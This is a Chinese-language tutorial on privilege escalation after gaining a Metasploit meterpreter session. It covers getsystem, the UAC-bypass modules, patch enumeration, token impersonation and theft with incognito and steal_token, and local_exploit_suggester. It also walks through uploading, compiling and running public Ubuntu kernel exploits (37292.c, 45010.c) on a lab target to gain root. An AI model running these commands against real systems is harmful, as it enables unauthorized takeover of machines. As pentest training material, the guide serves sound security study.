利用MSF进行系统提权

直接输入提升权限命令

meterpreter>getsystem

使用MSF内置BYPASSUAC提权

MSF内置有多个bypassuac模块，原理有所不同，使用方法类似，运行后返回一个新会话后再次执行getsystem获取系统权限。

msf6>search bypassuac

exploit/windows/local/bypassuac
exploit/windows/local/bypassuac_comhijack
exploit/windows/local/bypassuac_eventvwr 
exploit/windows/local/bypassuac_fodhelper
exploit/windows/local/bypassuac_injection
exploit/windows/local/bypassuac_injection_winsxs
exploit/windows/local/bypassuac_sluihijack
exploit/windows/local/bypassuac_vbs

使用MSF的enum_patches模块

使用MSF的enum_patches模块，收集补丁信息，然后查找可用exploits进行提权

meterpreter>run post/windows/gather/enum_patches

自行根据不同的补丁所存在的漏洞使用msf存在的脚本进行权限提升

令牌操作 INCOGNITO假冒令牌

meterpreter>use incognito   #加载incognito模块

meterpreter>list_tokens -u  #查看可用的token

meterpreter>impersonate_token 'PIG\testpig' #此处假设PIG\testpig为可用token

execute -f cmd.exe -i -t      #  -t 使用假冒的token执行cmd.exe，亦可以直接输入shell进入当前token的终端

rev2self  #返回原始token

STEAL_TOKEN窃取令牌

meterpreter>ps #先ps列出进程详细信息

meterpreter>steal_token <pid值> #从指定进程中窃取token

meterpreter>rev2self #返回原始token

利用metaspolit的内置模块Local Exploit Suggester

这个模块可以帮助我们识别系统存在哪些漏洞可以被利用，在拿到meterpreter会话的前提下，通过扫描，然后列出提供最合适的exp，通过合适的exp我们可以进一步提权。

use post/multi/recon/local_exploit_suggester

set LHOST <ip地址>

set SESSION 1 #会话id

run

使用Ubuntu本地提权漏洞

案例1:

首先使用命令lsb_release -a查看系统发行的版本。
同时使用命令uname -a查看内核版本信息

此处假设目标靶机的操作系统是Ubuntu 14.04.4 LTS，内核版本为3.13.0-45-generic

第一种方法：使用常规的溢出漏洞overlayfs，支持ubuntu 12.04/14.04/14.10/15.04和内核版本大于3.13.0小于3.19。

searchsploit overlayfs ubuntu local #搜索中关键字overlayfs的ubuntu本地提权利用漏洞的源码
复制/usr/share/exploitdb/exploits/linux/local/37292.c至/root目录 #此处假设源码为37292.c
进入Meterpreter命令行，使用命令upload 37292.c将该exp上传至靶机
最后使用命令shell打开靶机的终端
使用命令gcc -o overlayfs 37292.c #编译exp（-o参数为命名）
然后使用命令chmod 777 overlayfs 给exp进行赋权
最后使用命令./overlayfs进行提权，最终获得靶机最高权限，

案例2:

此处假设目标靶机的操作系统是Ubuntu 16.04 LTS，内核版本为4.10.0-22-generic

msf6>searchsploit Ubuntu 16.04 #此处找到一个合适的漏洞为45010

cd /root

cp /usr/share/exploitdb/exploits/linux/local/45010.c ./    #把利用源码拷贝到当前目录

gcc 45010.c -o 45010   #编译（-o参数为命名）

meterpreter>upload /root/45010 /tmp/45010 #(放到tem目录是因为tem目录一般都有权限)

meterpreter>shell

cd /tem

chmod +x 45010

./45010